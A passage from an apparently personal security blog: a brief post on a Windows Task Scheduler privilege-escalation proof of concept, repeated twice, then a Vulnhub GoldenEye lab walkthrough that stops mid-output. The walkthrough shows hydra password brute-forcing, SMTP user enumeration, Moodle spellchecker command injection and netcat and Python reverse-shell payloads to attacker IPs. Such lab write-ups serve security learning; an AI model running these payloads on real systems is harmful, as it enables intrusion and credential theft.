On Aug 27, freelance researcher @SandboxEscaper let loose a POC 0-day privilege escalation affecting all versions of Windows.
From what I gather, the vulnerability was not responsibly disclosed. There was some banter on Twitter towards SandboxEscaper…
A few days later, Acros Security, a security research company in Slovenia released an unofficial patch. Eventually, Microsoft released an official patch as part of the September Patch Tuesday on the 10th.
As detailed in VU#906424. A flaw exist due to the way the SchRpcSetSecurity API (which is part of the Windows Task Scheduler), handles the Advanced Local Procedure Call (ALPC) interface. This can be leveraged to overwrite protected system files in which an authenticated user does not have access too.
--> Let’s play with the poc
First, fire up my Windows 10 vm, and make sure I’m a regular low-privileged user
Let’s check the spoolsv.exe service through process explorer. As below, no child process is spawned or running:
Now I open notepad (PID 1988). As below, running as n33dle (low-priv) user:
Now let’s inject this process into spoolsv using the poc exploit:
And there you have it… notepad.exe now running as NT AUTHORITY\SYSTEM as a child process from spoolsv.exe.
--> Mitigation/Remediation
1. Ultimately, patch systems as per CVE-2018-8440 (Microsoft September Security Updates).
2. Not recommended, but you could modify the NTFS ACL on the Tasks directory under C:\windows. Removing the Authenticated Users group and deny system user.
--> icacls c:\windows\tasks /remove:g "Authenticated Users"
--> icacls c:\windows\tasks /deny system:(OI)(CI)(WD,WDAC)
That’s it for now. I’m going to look into the source code and see if I can spawn a SYSTEM command shell. Will need to modify the resource.aps source file, as that is used to compile the DLL which is injected into the spoolsv service.
--> n33dle
On Aug 27, freelance researcher @SandboxEscaper let loose a POC 0-day privilege escalation affecting all versions of Windows.
From what I gather, the vulnerability was not responsibly disclosed. There was some banter on Twitter towards SandboxEscaper…
A few days later, Acros Security, a security research company in Slovenia released an unofficial patch. Eventually, Microsoft released an official patch as part of the September Patch Tuesday on the 10th.
As detailed in VU#906424. A flaw exist due to the way the SchRpcSetSecurity API (which is part of the Windows Task Scheduler), handles the Advanced Local Procedure Call (ALPC) interface. This can be leveraged to overwrite protected system files in which an authenticated user does not have access too.
--> Let’s play with the poc
First, fire up my Windows 10 vm, and make sure I’m a regular low-privileged user
Let’s check the spoolsv.exe service through process explorer. As below, no child process is spawned or running:
Now I open notepad (PID 1988). As below, running as n33dle (low-priv) user:
Now let’s inject this process into spoolsv using the poc exploit:
And there you have it… notepad.exe now running as NT AUTHORITY\SYSTEM as a child process from spoolsv.exe.
--> Mitigation/Remediation
1. Ultimately, patch systems as per CVE-2018-8440 (Microsoft September Security Updates).
2. Not recommended, but you could modify the NTFS ACL on the Tasks directory under C:\windows. Removing the Authenticated Users group and deny system user.
--> icacls c:\windows\tasks /remove:g "Authenticated Users"
--> icacls c:\windows\tasks /deny system:(OI)(CI)(WD,WDAC)
That’s it for now. I’m going to look into the source code and see if I can spawn a SYSTEM command shell. Will need to modify the resource.aps source file, as that is used to compile the DLL which is injected into the spoolsv service.
--> n33dle
Sunday 19 August 2018
Vulnhub Walkthrough - Goldeneye
Took a while with this one, was only doing a bit here and there when I had the chance.
This one was fun. Some of the intial recon was more puzzle then real-world, but still enjoyable.
Initial compromise was via an exploit in the Moodle web application, then escalated to root through the infamous overlayfs Ubuntu/Linux Kernel exploit.
You can grab this vulnhub machine from here:
https://www.vulnhub.com/entry/goldeneye-1,240/
--> MISSION
The goal is to get root and capture the secret GoldenEye codes - flag.txt.
My target machine IP address is 192.168.111.128
--> REC0N / ENUMERATION
Let's start off with a full port scan:
root@kali:~# nmap -n -v -p- -T4 -sS 192.168.111.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-14 06:10 EDT
Initiating ARP Ping Scan at 06:10
Scanning 192.168.111.128 [1 port]
Completed ARP Ping Scan at 06:10, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:10
Scanning 192.168.111.128 [65535 ports]
Discovered open port 80/tcp on 192.168.111.128
Discovered open port 25/tcp on 192.168.111.128
Discovered open port 55007/tcp on 192.168.111.128
Discovered open port 55006/tcp on 192.168.111.128
Completed SYN Stealth Scan at 06:10, 1.69s elapsed (65535 total ports)
Nmap scan report for 192.168.111.128
Host is up (0.00081s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
And a udp scan using udp-proto-scanner:
root@kali:~# udp-proto-scanner.pl 192.168.111.128
Starting udp-proto-scanner v1.1 ( http://labs.portcullis.co.uk/application/udp-proto-scanner ) on Tue Aug 14 06:13:07 2018
================================================================================
Bandwith: .................... 250k bits/second
Max Probes per host: ......... 3
Config file: ................. /usr/local/bin/udp-proto-scanner.conf
Probes names: ................ DNSStatusRequest,DNSVersionBindReq,NBTStat,NTPRequest,RPCCheck,SNMPv3GetRequest,chargen,citrix,daytime,db2,echo,gtpv1,ike,ms-sql,ms-sql-slam,netop,ntp,rpc,snmp-public,systat,tftp,time,xdmcp
================================================================================
Sending DNSStatusRequest probes to 1 hosts...
Sending DNSVersionBindReq probes to 1 hosts...
Sending NBTStat probes to 1 hosts...
Sending NTPRequest probes to 1 hosts...
Sending RPCCheck probes to 1 hosts...
Sending SNMPv3GetRequest probes to 1 hosts...
Sending chargen probes to 1 hosts...
Sending citrix probes to 1 hosts...
Sending daytime probes to 1 hosts...
Sending db2 probes to 1 hosts...
Sending echo probes to 1 hosts...
Sending gtpv1 probes to 1 hosts...
Sending ike probes to 1 hosts...
Sending ms-sql probes to 1 hosts...
Sending ms-sql-slam probes to 1 hosts...
Sending netop probes to 1 hosts...
Sending ntp probes to 1 hosts...
Sending rpc probes to 1 hosts...
Sending snmp-public probes to 1 hosts...
Sending systat probes to 1 hosts...
Sending tftp probes to 1 hosts...
Sending time probes to 1 hosts...
Sending xdmcp probes to 1 hosts...
Scan complete at Tue Aug 14 06:13:59 2018
I've got tcp/80, tcp/25, tcp/55006 and tcp/55007 to work with.
Let's check out the web page:
Cool little console animation plays. I check the source and the javascript that's running is terminal.js.
This holds something interesting in it's source!
var data = [ { GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>" } ]; // //Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic.... // //I encoded you p@ssword below... // //InvincibleHack3r // //BTW Natalya says she can break your codes // var allElements = document.getElementsByClassName("typeing"); for (var j = 0; j < allElements.length; j++) { var currentElementId = allElements[j].id; var currentElementIdContent = data[0][currentElementId]; var element = document.getElementById(currentElementId); var devTypeText = currentElementIdContent; var i = 0, isTag, text; (function type() { text = devTypeText.slice(0, ++i); if (text === devTypeText) return; element.innerHTML = text + `<span class='blinker'> </span>`; var char = text.slice(-1); if (char === "<") isTag = true; if (char === ">") isTag = false; if (isTag) return type(); setTimeout(type, 60); })(); }
Whatever this is, it's encoded:
InvincibleHack3r
Through google I find it's HTML encoded. I run it through a decoding site which gives me:
InvincibleHack3r
Most likely creds!
So i try username boris and password InvincibleHack3r on http://192.168.111.128/sev-home/
We're in!
Nothing really to look at. So I go back to my nmap scan. This time I run a more aggressive scan on the discovered ports:
root@kali:~# nmap -n -v -p 25,80,55007,55006 -T4 -sS -A 192.168.111.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-14 06:36 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:36
Completed NSE at 06:36, 0.00s elapsed
Initiating NSE at 06:36
Completed NSE at 06:36, 0.00s elapsed
Initiating Ping Scan at 06:36
Scanning 192.168.111.128 [4 ports]
Completed Ping Scan at 06:36, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:36
Scanning 192.168.111.128 [4 ports]
Discovered open port 25/tcp on 192.168.111.128
Discovered open port 80/tcp on 192.168.111.128
Discovered open port 55006/tcp on 192.168.111.128
Discovered open port 55007/tcp on 192.168.111.128
Completed SYN Stealth Scan at 06:36, 0.06s elapsed (4 total ports)
Initiating Service scan at 06:36
Scanning 4 services on 192.168.111.128
Completed Service scan at 06:36, 31.03s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.111.128
Initiating Traceroute at 06:36
Completed Traceroute at 06:36, 0.02s elapsed
NSE: Script scanning 192.168.111.128.
Initiating NSE at 06:36
Completed NSE at 06:37, 28.59s elapsed
Initiating NSE at 06:37
Completed NSE at 06:37, 0.01s elapsed
Nmap scan report for 192.168.111.128
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| Hello:
| 220 ubuntu GoldentEye SMTP Electronic-Mail agent
|_ Syntax: EHLO hostname
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: USER CAPA SASL(PLAIN) AUTH-RESP-CODE PIPELINING RESP-CODES UIDL TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE RESP-CODES UIDL TOP STLS SASL(PLAIN) CAPA USER PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=8/14%Time=5B72B0A8%P=x86_64-pc-linux-gnu%r(Hell
SF:o,4D,"220\x20ubuntu\x20GoldentEye\x20SMTP\x20Electronic-Mail\x20agent\r
SF:\n501\x20Syntax:\x20EHLO\x20hostname\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running: Actiontec embedded, Linux 2.4.X|3.X
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37 cpe:/o:linux:linux_kernel:3.2
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
While I'm at it, I check boris and natalya are valid users through the SMTP vrfy function:
root@kali:~# nc -nv 192.168.111.128 25
(UNKNOWN) [192.168.111.128] 25 (smtp) open
EHLO hostname
220 ubuntu GoldentEye SMTP Electronic-Mail agent
250-ubuntu
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
vrfy boris
252 2.0.0 boris
vrfy natalya
252 2.0.0 natalya
vrfy doesnotexist
550 5.1.1 <doesnotexist>: Recipient address rejected: User unknown in local recipient table
vrfy bond
550 5.1.1 <bond>: Recipient address rejected: User unknown in local recipient table
vrfy james
550 5.1.1 <james>: Recipient address rejected: User unknown in local recipient table
I also run a nikto scan on the site... hmm nothing exciting:
root@kali:~/Documents/vulnhub/goldeneye# nikto -h http://192.168.111.128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.111.128
+ Target Hostname: 192.168.111.128
+ Target Port: 80
+ Start Time: 2018-08-14 06:53:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xfc 0x56aba821be9ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated: 20 error(s) and 4 item(s) reported on remote host
+ End Time: 2018-08-14 06:53:44 (GMT-4) (0 seconds)
---------------------------------------------------------------------------
Site backend looks to be running moodle. As per google "Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License"
Any exploits:
root@kali:~# searchsploit moodle
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Mambo Component Mam-Moodle alpha - Remote File Inclusion | exploits/php/webapps/2064.txt
Moodle - Remote Command Execution (Metasploit) | exploits/linux/remote/29324.rb
Moodle 1.1/1.2 - Cross-Site Scripting | exploits/php/webapps/24071.txt
Moodle 1.5.2 - 'moodledata' Remote Session Disclosure | exploits/php/webapps/3508.txt
Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting | exploits/php/webapps/29284.txt
Moodle 1.6dev - SQL Injection / Command Execution | exploits/php/webapps/1312.php
Moodle 1.7.1 - 'index.php' Cross-Site Scripting | exploits/php/webapps/30261.txt
Moodle 1.8.3 - 'install.php' Cross-Site Scripting | exploits/php/webapps/31020.txt
Moodle 1.8.4 - Remote Code Execution | exploits/php/webapps/6356.php
Moodle 1.9.3 - Remote Code Execution | exploits/php/webapps/7437.txt
Moodle 1.x - 'post.php' Cross-Site Scripting | exploits/php/webapps/24356.txt
Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting | exploits/php/webapps/35297.txt
Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities | exploits/php/webapps/28174.txt
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting | exploits/php/webapps/36418.txt
Moodle 2.7 - Persistent Cross-Site Scripting | exploits/php/webapps/34169.txt
Moodle 2.x/3.x - SQL Injection | exploits/php/webapps/41828.php
Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure | exploits/php/webapps/8297.txt
Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection | exploits/php/webapps/28770.txt
Moodle Help Script 1.x - Cross-Site Scripting | exploits/php/webapps/24279.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Just a few :)
Might be some interesting things to try here. RFI and RCE. But first I'll have a look around on the page. I have those xenia creds that'll probably come in use somewhere...
The intro to Goldeneye link takes me to a login page:
The xenia credentials work!
There's a message for Xenia from Dr. Doak. Let's check that out.
Greetings Xenia,
As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.
My email username is...
doak
Thank you,
Cheers,
Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.
Ok, another username. doak.
I don't have creds, but perhaps I should try adding doak and even the user 'admin' to another hydra attack.
I'll put them into another users file:
root@kali:~/Documents/vulnhub/goldeneye# echo "doak" > goldeneye-users2.txt
root@kali:~/Documents/vulnhub/goldeneye# echo "admin" >> goldeneye-users2.txt
I look around the site. There's nothing in terms of courses/blogs or any other info/intel of use.
Based on the message above, perhaps confirming the xenia account will open up some possibilities?
Kick off another hydra...
root@kali:~/Documents/vulnhub/goldeneye# hydra -L goldeneye-users2.txt -P /usr/share/wordlists/fasttrack.txt -s 55007 192.168.111.128 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-16 22:27:09
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task
[DATA] attacking pop3://192.168.111.128:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 364 to do in 00:05h, 16 active
[55007][pop3] host: 192.168.111.128 login: doak password: goat
Oh wow... that worked. Let's see if there's anything interesting in doak's mail...
root@kali:~/Documents/vulnhub/goldeneye# nc 192.168.111.128 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu
James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......
username: dr_doak
password: 4England!
.
quit
+OK Logging out.
root@kali:~/Documents/vulnhub/goldeneye#
Sure enough, we have more creds! Lets try and login to the moodle site using these creds.
We're in!
So looking around the site, couldn't find anything, then I came across a folder called 'for james' which contained a s3cret.txt file.
It's contents:
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
So I navigate to that url:
Haha nice. But what do we have here? Perhaps 486 is something? Or maybe the jpeg has some embedded info? Let's see...
Download it:
root@kali:~/Documents/vulnhub/goldeneye# wget http://severnaya-station.com//dir007key/for-007.jpg
--2018-08-16 22:37:28-- http://severnaya-station.com//dir007key/for-007.jpg
Resolving severnaya-station.com (severnaya-station.com)... 192.168.111.128
Connecting to severnaya-station.com (severnaya-station.com)|192.168.111.128|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14896 (15K) [image/jpeg]
Saving to: ‘for-007.jpg’
for-007.jpg 100%[===================================================================================================================================================>] 14.55K --.-KB/s in 0s
2018-08-16 22:37:28 (218 MB/s) - ‘for-007.jpg’ saved [14896/14896]
root@kali:~/Documents/vulnhub/goldeneye# exif for-007.jpg
EXIF tags in 'for-007.jpg' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag |Value
--------------------+----------------------------------------------------------
Image Description |eFdpbnRlcjE5OTV4IQ==
Manufacturer |GoldenEye
Resolution Unit |Inch
Software |linux
Artist |For James
YCbCr Positioning |Centered
X-Resolution |72
Y-Resolution |72
Exif Version |Unknown Exif Version
Components Configura|Y Cb Cr -
User Comment |For 007
FlashPixVersion |FlashPix Version 1.0
Color Space |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------
Hmmm that image description looks suss! Lets base64 decode it...
root@kali:~/Documents/vulnhub/goldeneye# echo eFdpbnRlcjE5OTV4IQ== | base64 --decode
xWinter1995x!
root@kali:~/Documents/vulnhub/goldeneye#
OK, now that looks like creds to me...
Maybe for the admin user? My hydra completed without finding anything for the admin user. But lets try admin user with these new creds...
Winner winner
There's a bit to look at with admin settings, but I come across a system paths settings, where you can set a path to aspell, du and dot. Looks like you can enter system paths! Googling around, this looks like a known vector of attack for code execution.
I start a listener:
root@kali:~/Documents/vulnhub/goldeneye# nc -lvp 443
listening on [any] 443 ...
And I try updating the aspellpath to perform a reverse shell (hoping nc is installed).
sh -c '(nc 192.168.253.130 443 -e /bin/sh &)'
I create a blog post and run spellchecker. Hmm nothing...
Digging further in the settings, looks like the spellchecker is defaulted to use google, rather than a custom spell checker program, as we configured.
Now lets change this to PSpellShell.
So I spent hours, trying all sorts of reverse shell combos with no success. I went through my usual go to list below:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/
Nothing was working. I later released my goldeneye vm was configured to use host only networking and my Kali machine was using a NAT adapter.
This meant I could use my hosts physical adapter to access my internet and also access the goldeneye vm. However, there was not route back for my reverse shell to connect back too.
I changed my Kali machine to a host only adapter, on the same subnet as goldeneye.
My new kali IP is now 192.168.111.129.
Update the aspellshell path:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.129",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Hit spell check on a nonsense new blog:
root@kali:~/Documents/vulnhub/goldeneye# nc -lvp 443
listening on [any] 443 ...
connect to [192.168.111.129] from severnaya-station.com [192.168.111.128] 48560
/bin/sh: 0: can't access tty; job control turned off
$
BINGO!
--> TIME TO PE
Change over to a python tty shell and see what we're working with...
$ python -c 'import pty;pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /
cd /
www-data@ubuntu:/$ hostname
hostname
ubuntu
www-data@ubuntu:/$ uname -ra
uname -ra
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
www-data@ubuntu:/$ ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:2e:e5:d4
inet addr:192.168.111.128 Bcast:192.168.111.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe2e:e5d4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:323 errors:0 dropped:0 overruns:0 frame:0
TX packets:679 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:52359 (52.3 KB) TX bytes:1058811 (1.0 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:10760 errors:0 dropped:0 overruns:0 frame:0
TX packets:10760 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6139626 (6.1 MB) TX bytes:6139626 (6.1 MB)
www-data@ubuntu:/$
So Ubuntu 14.04.1 running Linux Kernel 3.13.0-32 64 bit....
I check out the directories in which the site is being hosted.
Looks like I found a new page:
www-data@ubuntu:/var/www/html$ ls -l
ls -l
total 264
drwxr-xr-x 3 www-data www-data 4096 Apr 25 07:29 006-final
drwxr-xr-x 2 www-data www-data 4096 Apr 25 07:29 dir007key
drwxr-xr-x 41 www-data www-data 4096 Apr 25 07:27 gnocertdir
-rwxr--r-- 1 www-data www-data 354 Apr 24 17:49 index.css
-rw-r--r-- 1 www-data www-data 252 Apr 25 23:29 index.html
-rw-r--r-- 1 www-data www-data 39748 Apr 24 15:58 logo.png
-rw-r--r-- 1 www-data www-data 4 Apr 25 07:37 rtm.log
drwxr-xr-x 2 www-data www-data 4096 Apr 24 19:34 sev-home
-rw-r--r-- 1 www-data www-data 184883 Apr 25 07:47 sniper.png
-rw-r--r-- 1 www-data www-data 2301 Apr 29 09:33 space.gif
-rw-r--r-- 1 www-data www-data 1414 Apr 29 10:18 splashAdmin.php
-rw-r--r-- 1 www-data www-data 1349 Apr 24 17:56 terminal.js
www-data@ubuntu:/var/www/html$ dir 006-final
dir 006-final
sata_drop.webm sata_drop.webm.1 x8vtfinal-flag.gif xvf7-flag
www-data@ubuntu:/var/www/html$
Lets check them in firefox:
Hahaha nice:
Quick look around I don't see anything exciting to move me forward....
What else do we have?
www-data@ubuntu:/var/www/html$ ls -la
ls -la
total 272
drwxr-xr-x 6 root root 4096 Apr 29 10:18 .
drwxr-xr-x 4 root root 4096 Apr 23 20:56 ..
drwxr-xr-x 3 www-data www-data 4096 Aug 16 20:53 006-final
drwxr-xr-x 2 www-data www-data 4096 Apr 25 07:29 dir007key
drwxr-xr-x 41 www-data www-data 4096 Apr 25 07:27 gnocertdir
-rwxr--r-- 1 www-data www-data 354 Apr 24 17:49 index.css
-rw-r--r-- 1 www-data www-data 252 Apr 25 23:29 index.html
-rw-r--r-- 1 www-data www-data 39748 Apr 24 15:58 logo.png
-rw-r--r-- 1 www-data www-data 4 Apr 25 07:37 rtm.log
drwxr-xr-x 2 www-data www-data 4096 Apr 24 19:34 sev-home
-rw-r--r-- 1 www-data www-data 184883 Apr 25 07:47 sniper.png
-rw-r--r-- 1 www-data www-data 2301 Apr 29 09:33 space.gif
-rw-r--r-- 1 www-data www-data 1414 Apr 29 10:18 splashAdmin.php
-rw-r--r-- 1 www-data www-data 1349 Apr 24 17:56 terminal.js
Looking at the root I find sniper.jpg...
Ahhh makes me wanna play Goldeneye...
Lets check the exif data on this one...
Nah nothing...
So I check out splashAdmin.php:
Hard to read, but the line that sounds most interesting is: "For programming I highly prefer the Alternative to GCC, which FreeBSD uses. It's more verbose when compiling, throwing warnings and such - this can easily be turned off with a proper flag. I've replaced GCC with this throughout the GolenEye systems. "
I'll keep that in mind. I keep looking through the file system, especially under /var/www and find some uploaded files through moodle:
-rw-rw-rw- 1 www-data www-data 168 Apr 23 21:16 warning.txt
./05:
total 4
drwxrwsrwx 2 www-data www-data 4096 Aug 15 19:46 6d
./05/6d:
total 8
-rw-rw-rw- 1 www-data www-data 4795 Aug 15 19:46 056d495e4768cf97825602ed6a1096eab6d67a5a
./82:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:10 34
./82/34:
total 1496
-rw-rw-rw- 1 www-data www-data 1529575 Apr 24 16:10 82341a17005e75a8f4614ea435acbc3148cf30ea
./a6:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:15 f9
./a6/f9:
total 4
-rw-rw-rw- 1 www-data www-data 3242 Apr 24 16:15 a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d
./ad:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 18:28 5c
./ad/5c:
total 4
-rw-rw-rw- 1 www-data www-data 364 Apr 24 18:28 ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
./da:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:10 39
./da/39:
total 0
-rw-rw-rw- 1 www-data www-data 0 Apr 24 16:10 da39a3ee5e6b4b0d3255bfef95601890afd80709
www-data@ubuntu:/var/www/moodledata/filedir$
First one is an attempted php moodle exploit I tried previously.
www-data@ubuntu:/var/www/moodledata/filedir/05/6d$ file 82341a17005e75a8f4614ea435acbc3148cf30ea BORIS GIF
82341a17005e75a8f4614ea435acbc3148cf30ea: GIF image data, version 89a, 500 x 278
www-data@ubuntu:/var/www/moodledata/filedir/a6/f9$ file a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d NATALYA GIF
<odledata/filedir/a6/f9$ file a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d
a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d: JPEG image data, JFIF standard 1.01
www-data@ubuntu:/var/www/moodledata/filedir/ad/5c$ file ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
<odledata/filedir/ad/5c$ file ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
ad5c3bc9ae900b39509eb2d6a727455e39d77b9b: ASCII text, with CRLF line terminators
^Just contained this text message:
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
Last one is empty:
www-data@ubuntu:/var/www/moodledata/filedir/da/39$ file da39a3ee5e6b4b0d3255bfef95601890afd80709
<odledata/filedir/da/39$ file da39a3ee5e6b4b0d3255bfef95601890afd80709
da39a3ee5e6b4b0d3255bfef95601890afd80709: empty
Nothing fun here...
Going back to the Linux version, let check what kernel exploits we have available for 3.13.0:
root@kali:~/Documents/vulnhub/goldeneye# searchsploit Linux Kernel 3.13.0
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
